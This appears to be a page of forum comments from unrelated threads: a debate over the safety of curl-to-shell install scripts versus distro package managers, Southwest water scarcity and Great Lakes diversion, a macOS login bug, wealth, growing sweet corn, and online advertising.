It's about as safe as trusting all the add-ons in your IDE, and all the packages your node app pulls from random package repos.
It's just the plausible blame that shifts.
If you read the script before you pipe it into your shell, it's safe.
And if that's not safe, then it's just as dangerous to trust that an unopened bottle of ketchup is safe.
Nothing is safe. Everything is a judgement. Being culpable is a professional service. Lucky people out-earn unlucky people. The world is a scary place.
No, not really. This reads like ornate hand waving to distract from different threat models and situations.
A lot of safety is down to accountability. A distribution through an attributable marketplace or being verifiably signed.
Safety isn't a performative action, so reading a script may still confuse you or you may miss subtleties. But opting for a safer install mechanism makes a huge difference, which is we always ought to prefer apt, dnf, over the likes of curlbash, brew, npm.
I'm Not sure that I agree that it is automatically safer to prefer apt or dnf, and I'm definitely sure that it is not safer to prefer npm.
Safety is about managing risk. One element of managing risk is evaluating trust. I'm thinking that there are much fewer people I have to trust by copying the curl | bash install method from homebrew's secure website.
But at any rate, I completely agree that piping a curl'd script directly to the shell should be considered unsafe, even if it's from a trusted source. It's quite easy to do additional checks to reduce your risk significantly for this type of attack. You could read the contents of your clipboard with a hex editor and check for non-ascii characters. But wait? How do I install the hex editor? Don't I need a hex editor to check the install method of the hex editor? AAAAH! It's turtles all the way down!!!!
It's nice until you need something that isn't in the distro repo. Personally i prefer a script i can easily inspect over a .deb that will also run it's own scripts (as root!) that it takes me much more effort to inspect.
I guess yeah, you are right, distro repos are safest, but there's lots of times where they aren't sufficient.
Linux distributions contain a curated set of packages. And, if any, distros like Guix can import NPM crap and at least place it under an isolated container for work so the rest it's unharmed.
also you're getting at least some of crowd safety in it. If you're using Debian Testing or a rolling distro your package was probably tested by a bunch of people already.
If you're using stable/LTS branch, there were far more eyes on it too
And packages are signed, can't just hijack web domain to inject code
> If you read the script before you pipe it into your shell, it's safe.
If you download it first before executing it (instead of downloading it a second time when executing it), then that mitigates one problem, but still not all of them (like you mention). Other mitigations are also possible, such as hashing, certificate pinning, sandboxing, etc.
This is a good point. Made me think about how I will usually read if first, but in the browser. And it's easy for the server to check the user agent, and serve me a different version in the browser!
If you read the script before piping it into your shell, you're doing better than (I'm guessing) 90% of people, but it's still possible that the attacker who got you to copy https://xn--nstall-ovf.xn--example-cl-62i.dev into your terminal has also made similarly-hard-to-spot changes to the install script. E.g. if it downloads a .deb package from https://xn--nstall-ovf.xn--example-cl-62i.dev (same Cyrillic і character in there that looks like a Latin i but isn't), you might not spot that by reading the script.
But IMHO, your "unopened bottle of ketchup" analogy doesn't work. These days, the likelihood of someone trying to trick you into running arbitrary code disguised as an install script is so much higher than the chance that someone working at the ketchup bottling plant is deliberately contaminating bottles before they go out.
This is why we have linux distributions with maintainers who can take at least a basic look at the software, vet dependencies and run it through a test suite. And they only have to do that once for each new version and not again and again for each download.
As a child in the 1980s we'd go for long walks in the woods. One time a friend brought a pair of 30 inch bolt cutters with him, you know, as a personality extension. And of course, there was some dubious reason to use them, and he was a hero for being over-provisioned.
A solution like this is those bolt cutters - I can admire it, but the odds I'm out on a walk with it, is very, very low.
Now if you work in a bolt factory, sure, this can run on every laptop, every user account, every environment.
But I'd hope my edge firewalls are L7 scanning for cyrillic 'i' in my domains cause otherwise I'm just gonna connect and get myself hacked.
Also there's always the risk that the bolt cutter has a defect (perhaps deliberately introduced at some point when it was manufactured) which will cause you more damage than the thing you're trying to prevent by carrying it.
I'm personally a bit wary of introducing a relatively obscure security tool into my setup, to protect against a rare possible attack. The chance that I'll get caught copy-pasting a compromised URL into my terminal is fairly small, and there's also a small chance I'll compromise my system either now or at some later point via a supply chain attack if I use the tool. Which chance is bigger?
Are you really inspecting every app you install, including all its dependencies, and the dependencies of those dependencies, to a level of detail sufficient to identify sophisticated and obfuscated backdoors?
In the real world, nobody does this. Instead, you make a conscious choice to trust the apps that you install. Every decision of whether to install an app is a tradeoff between (a) the risk that that trust is misplaced, and (b) the benefits of the app.
I know there's no single answer to this. But, if we wanted to mitigate this, do we have the geoengineering ability to execute on it?
I know 'wanted' is doing a lot of lifting there. Solve the hypothetical as a star trek culture, everyone wants this to work.
What would it look like?
I am under the belief that we get a lot of fresh water but because we baked the earth or paved it, and that an awful lot of water could be redirected into the ground if only we could slow it down.
Could America engineer an aquaduct from the great lakes to california?
would it destroy the great lakes?
i dont know a thing about this topic other than from my arm chair, i'm just here to start a thread if there's interest, i'm sure interested to hear from people smarter than me
Not an expert, but a more-than-casual-observer as someone who has lived on the water (literally and figuratively).
A core part of the problem is things like the farming in California that uses excessive amounts of water, which is already brought in from very distant regions.
I don't think there is a way to distribute the fresh water supply equitably if you have various regions and industries that insist on being highly inefficient and wasteful. California is certainly not the only example, there are lots of places trying to grow crops in illogical places, water supplies being polluted by industries, etc.
The problem isn’t just farming in the desert. The problem is all those people living in the desert in the first place. There is a reason the Spanish then the Mexicans did almost nothing to settle and develop California. It was massive water projects by the U.S. Army Corps of Engineers that made modern California possible.
It's really intertwined. While California exports a LOT, people need to eat and the economies of scale lean towards eating locally grown crops. Living in a desert creates some degree of demand for local crops.
1. crops in the desert are generally OK if they are directly for human consumption. The problem is growing alfalfa and other crops intended to feed livestock - they are incredibly thirsty crops, and the end result is not a lot of food in terms of nutrients or calories. Plus the little detail that a huge amount of the meat produced in the SW is exported to Asia, and so it might "look local" but actually isn't
2. even human-consumption crops are a lesser problem if the farms use the old techniques collectively known as "flood irrigation". Farming in the SW needs to switch to drip irrigation, which requires a significant capital investment by farmers, and I don't think they should be required to bear the whole (and perhaps not even the majority) of that cost.
California isn't even the problem. They're rich enough and big enough, (and fortuitously situated enough), that they just crank up desal plants and go happily on their way.
What about the rest of the west?
Arizona? New Mexico? Nevada? etc etc
Water needs to be brought in from somewhere? Who's going to pay for that? How do you do it safely, sustainably. And on and on.
I know people forget the rest of the west a lot. (Or maybe they just don't care about us as much?) But it's actually more of an issue in those places than it is in California.
A personal illustrative story. I used to live in Scottsdale. The water issue is such common knowledge out there that people started trying to get into the magic zip code. (Phoenix sits on like a gazillion years worth of water that they squirreled away.) I had moved into the magic zip code just about 1 year before everything went crazy. As it happened, about 18 months after we moved to that zip, we decided to move back to the Great Lakes region. Fully expecting to lose money on the house. But the word had got out on that zip code, and the final offer was over 60% more than we'd paid just 18 months prior.
That gives an indication of how even individuals are thinking. It just kind of felt like a lot of people, governments and organizations know there will be an issue, but money is gating everyone's ability to do anything about it.
Whereas of course, money's not as much of an issue in California.
I think large parts of the west will need help in the future. Or people will need to pay significantly more in taxes to live in those places.
It can't go on forever the way it has been. That much is certain.
>Phoenix sits on like a gazillion years worth of water that they squirreled away
True, but most of the groundwater under phoenix was contaminated by three superfund projects . Article [0] is from 2019 and says it’s “delayed”. They hit some targets in 2024, supposedly working on it with review due sometime this year [1]
Some of the suburbs haven’t been reached by the groundwater plumes, but phoenix itself was 2/3 in scope. So you don’t have a supply issue in maricopa city (which is a whole separate water district.. and an expensive one too: $100 bill even if you don’t use a drop), city of Scottsdale, etc
They're not segregated by zip, they're segregated by city.
If you live in Scottsdale, not in a certain zip, and the ish hits the fan water-wise, Phoenix is not giving you water. It's up to Scottsdale to provide you services.
That's why they call it a "magic zip". Not because of the zip itself, but because you get Phoenix services in that zip.
It's actually really important to know things like that when buying property down there. Some places have aquifers and reserves and others don't. Who is providing your services can have a critical impact on not only your quality of life, but also your property value.
Also, higher taxes is what it takes to create the new infrastructure to bring in water.
You gonna do a deal with California to get in on their desal plants? The infrastructure to pull that off will cost money. You gonna go the other way and desal through Texas? Even more money. Gonna continue to trust the Colorado and upgrade that infrastructure? Probably cheapest, but still a lot of money.
Essentially, whatever solution you come up with, it will cost money. Either the feds will have to pay it, or, as I said, the people who live in those areas will have to acclimate themselves to paying significantly higher taxes.
What you're describing is an artifact of the current political structure of the Phoenix area. When the shit hits the fan (which it might, and it might not) that political structure is going to be amended.
I don't think that moving water from CA is a part of the future for Arizona. If it was, then sure, taxes will play a role in that.
Even the solution I prefer - massively reducing agricultural water usage - will require money, but money is not going to create water near Phoenix IMO.
Everything I've read about desalination is that it is not really economically feasible. Has that changed? I don't think CA can "just crank up desal plants" in a practical sense.
But when I was in Scottsdale, I still considered it a long shot. The hot idea down there at that time was that giant Arizona desert PV farms would feed California electricity. They would send it back in the form of water.
Definitely works on paper. Only gets cheaper to operate the solar farms over time. But enormous capital costs.
Who's paying all that? I don't really think most of the people down in Arizona have the money it would take for that up front charge.
That's what I meant. California can float those kinds of costs. So for a place like California, it's definitely something they can do if the issue is pressed on them.
Places like Arizona, New Mexico, Nevada, I don't think they can? Maybe? But I don't think so. That's why I believe if the issue is pressed in western states outside of California, you would see much higher taxes that would likely make some people have to move.
> California can float those kinds of costs. So for a place like California, it's definitely something they can do if the issue is pressed on them.
That's correct. For reference, the simple upfront build cost of the desalination plant in Carlsbad in 2015 worked out to approximately $300 per county resident, which was peanuts to become effectively impervious to drought conditions in a populated and economically prosperous desert. San Diego had an over-$200B economy at the time, over $300B now.
How much has the infrastructure improved since then? I see on TV that some of California has snow and flash flooding. Are there attempts being made to capture that, or soak it into the ground? Or is it cheaper to keep using the old projects?
I see on YouTube that there are parts of Texas you can buy for peanuts because ranching doesn't work there any more. I gather that the cows eat so much of the ancient grassland away that the soil washed away and now we have flash flooding? Then I see terrible flooding in the main rivers. I wonder if it is because governments are (or were) good at big centralised water projects, but spending for thousands upon thousands of swales and check dams to be built is harder, and less sexy?
The Great Lakes states have an agreement surrounding how much water you can remove from the lakes. That would be your first regulatory hurdle.
In addition I suspect the loss associated with an aqueduct of that scale would make desalinization more efficient, which is generally cost prohibitive at current water levels.
The water pact is even more specific in that at least WI I believe you have to be East of the subcontinental divide to pull water from Lake Michigan.
Another poster mentioned real estate peaking in a zip code of AZ for having limited access to fresh water. I wonder how long until real estate along the great lakes starts becoming a long term hedge.
The Great Lakes have a management principle that is basically "You can use the water of the Great Lakes by permission as long as the water remains in the watershed." And permission is not automatic either.
The reason for that to a large degree is that the Great Lakes area looked over at the Southwest, which wasn't even as bad at the time as it is now, did some math, and worked out that if the Great Lakes tried to supply the Southwest that it would cause noticeable dropping of the water level. I'm sure it would be even more dropping now.
The problem is, the Great Lakes aren't just some big lakes with juicy fresh water that can be spent as desired. They are also international shipping lanes. They make it so that de facto Detroit, Chicago, and a whole bunch of other cities and places are ocean ports. Ocean ports are very, very valuable. There are also numerous other port facilities all along the great lakes, often relatively in the middle of nowhere but doing something economically significant. This is maintained by very, very large and continual dredging operations to keep these lanes open. Dropping the water levels would destroy these ports and make the dredging operations go from expensive to impossible.
So, getting large quantities of water out of the Great Lakes to go somewhere isn't just a matter of "the people who control it don't want to do that", which is still true, and a big obstacle on its own. The Southwest when asking for that water is also asking multiple major international ports to just stop being major international ports. That's not going to happen.
There's an even bigger problem if you're talking about the soutwhest in general: huge parts of it are thousands of feet above the Great Lakes. The energy costs of moving water horizontally are probably doable; pumping millions of acre-feet 5k feet vertically are almost certainly not (no matter what energy source you suggest using for this).
> Could America engineer an aquaduct from the great lakes to california?
Why would the midwestern states consent to that? The southwest is structurally unsustainable. If we can’t develop sufficient renewable energy to power desalination, we’ll probably have to abandon much of California.
My prediction is that if we ever have another civil war, it will be states going to war over access to water.
None of it is sustainable without diverting Colorado River water. Human habitation alone might be below what you can currently get out of the river, but who knows what climate change will do to that.
I don't believe that this is true. Colorado diversions might be currently used for residential purposes, but only because so much other water is used by agriculture. I'm fairly certain (though not completely certain) that AZ, NM in particular could support their residential populations with no Colorado diversions at all.
The largest such effort is China's South - North Water Transfer Project, look into that if you are interested in the subject. Its unbelievably gigantic in scale, yet the amount of water moved is relatively modest compared to the amount of consumption.
We've been moving cities and municipalities since the dawn of civilization. That's just how life worked.
Yes water works continue to improve but the age old solution is simply to stop city growth at its sustainable level and start moving people to other, newer, better areas to live.
-------
Alternatively, you can boom bust with feast and famine economics and have tons of people die due to poor planning. That's also part of the age old deal and it's evidence is written in the many mismanaged cities across history.
Perhaps it isn't possible because of economics. If you build an aquaduct to a somewhere sunny so that water is plentiful there, then farms, cities, parks, and so on will grow as long as the water is cheap, reaching the capacity of your infrastructure, and the causing a crisis whenever there's a droubt.
People don't know how to be efficient at scale. Large complex problems could in principle be understood by a few experts, but they always become political problems. (ie, people must be socially, politically, or religiously attached to the right ideas rather than strictly convinced by detailed facts) Worse, people don't know how to maintain excess. People are a gas, and expand to fill the space they're in. If we had an abundance of water, all people would do is expand their water usage until that abundance is gone.
Do you understand how much more food we produce on roughly the same amount of land (globally) than we did 60 years ago? Claiming that we don't know how to be efficient at scale is absurd.
Now, it is true that these production levels are very dependent on a bunch of practices that are likely not sustainable, and that's a serious and pressing issue. But the problem is not efficiency.
Further, as others have noted here (and so have I), it is animal-based food production that uses so much of the water that we use, and that's a choice we've made (particularly in the USA). We could make different choices (and some of us have tried to).
The Great Lakes Compact prevents water from being pumped out of the Great Lakes water basin.
And as someone in that basin the people here would go to war before they allowed water to be pumped across the country to water arid farmland. Doubly so when the region already has trouble competing in agricultural markets against those arid farms due to their irresponcible farming practises.
Desalination plants with extensive water transportation pipe systems like we have for natural gas. We would need to solve the salt water dumping problem but that could just be accepting loss of natural diversity in the area around desalination plants or dumping further out in the open sea.
Talk to a civil engineer about the lead times, length, flow rate, and elevation changes you'd need - nope, zero chance of any project that expensive and long-duration ever becoming operational.
Talk to a political scientist about the voters and leaders at the water intake end - nope, "over our dead bodies".
Could America engineer an aquaduct from the great lakes to california?
Good luck with that: “we mismanaged our water supply, and now we are coming for yours.” That, and the number of agreements and treaties with Canada concerning the Great Lakes.
And that’s before we figure out how to efficiently pump water over two mountain ranges.
i am positive there's a bug in tahoe where the login screen passsword text input is waiting for something to settle in the background, either with my weird unicomp keyboard, a remap i do, or even the external monitors.
my password is always incorrect unless i count to about 20 or 30 seconds. once i have 'redocked' for the day, unlocking it subsequently doesnt have the requirement. but every dock insertion, it comes back.
ive got a desk full of octo coupler relays and an arduino learning kit and i'm using AI to goad me into making a cascading small motor starter thing with an air particulate sensor that's taking 180 days to show up from China, to automatically control my 6 small air scrubbers in my wood shop since i'm allergic to just about everything in there but love the hobby
it is difficult for us to agree if there is a threshold to which a person who has accumulated wealth must have shifted from 'earning' it to 'taking' it, and whether 'taking' it is analogous to 'stealing' it.
sometimes people believe wealth transfer is a zero sum game, sometimes people believe it never is, and the truth is probably in between
if you believe that a single human can earn a thousand billion dollars, it follows you can believe a million people losing a million dollars is its just inverse
i dont know enough about people or money to make up my mind
i have a roaring vermont castings wood stove running, its -15C outside, and i am fine; i am 14 oak logs away from changing my world view
this system is fragile but we measure it instantaneously
This is a new years resolution question barely in disguise, but they're fun cause a lot of us are cooped up, barely 4 days into winter, 86ish to go, and we're champing at the bit for change.
I am pretty sure I'm a 50th percentiler. I'm mid 40s, kinda burned out but still struggling forward in my ok-but-not-hollywood IT career, I still have a passion for doing things well in a technical society that values doing things cheap (and well). The things I am known for being good at, I still google daily, and for a long time, I've been hungry for a change - any change - but especially one that isn't chaotically negative.
So in 2026, I wanna learn how dirt works.
I actually have a giant box of dirt sitting on a shelf at the UNH community co-op soil analysis lab, waiting to give me some kind of data about the soil behind my house. (Or is it dirt? I don't know what I'm getting into).
In 2024 I tried growing some corn. It never sprouted.
In 2025 I tried growing some corn. It sprouted and a few ears had enough kernels to make one full mouthful. Tasty, but maybe 7 calories of food for a year of effort.
So in 2026 I'd like to grow: one entire fully formed ear of sweet corn. Anything else is a bonus.
That's what I wanna develop in 2026 - learning how soil works enough to make it make a thing. Small moves, Ellie.
A couple of things about corn. It might not be soil at issue. Germination depends on correct temperature and moisture. Too much moisture the seed will rot or not have enough air to germinate. Too little moisture it won't trigger germination. Too deep it won't germinate, too shallow and germination won't happen either because it will dry out instead of staying moist. Seeds vary in depth they require and some even require light to germinate (doesn't apply to corn). It's a bit of an art figuring out what "even moisture until germination" is, and this varies based on soil type. Timing of planting with correct temperature is important.
Each kernel of corn has one silk. The silk is analogous to a Fallopian tube with pollen traveling down into the ovary (or kernel of corn in this case). If you have an ear of corn with only a few kernels it's often because pollen didn't land on all the silks. For this reason corn is usually planted in blocks. It's wind pollinated so wind shakes pollen off the tassels or male flowers at the top, down onto the silk. But if you just have one corn plant in isolation, or a row in isolation it's easier for the pollen to just blow away or miss. Planting in blocks or "array of arrays" configuration helps the pollen to reach the silk more uniformly as pollen from the surrounding plants is released.
I've also had a ton of luck growing corn in 5 gallon buckets with holes drilled in the side to allow air into the soil which keeps the roots from balling up (wasting energy that should go into growing ears). Used potting mix with a handful of lime and a handful of epsom salt, and topped the buckets with mulch to retain moisture.
If you're willing to try that approach, this was very similar to my system:
i'm probably using an informal fallacy but if online advertisers earn hundreds of billions of dollars, someone must be finding some return on their investment.
i might be wrong, it might just be a huge grift, but i dont know how to come to that conclusion
My suspicion that is a huge grift ? This is what I want to find out. I know very little people in my social circle that used internet ads successfully for their business and very little that found them useful at all
It's just the plausible blame that shifts.
If you read the script before you pipe it into your shell, it's safe.
And if that's not safe, then it's just as dangerous to trust that an unopened bottle of ketchup is safe.
Nothing is safe. Everything is a judgement. Being culpable is a professional service. Lucky people out-earn unlucky people. The world is a scary place.
reply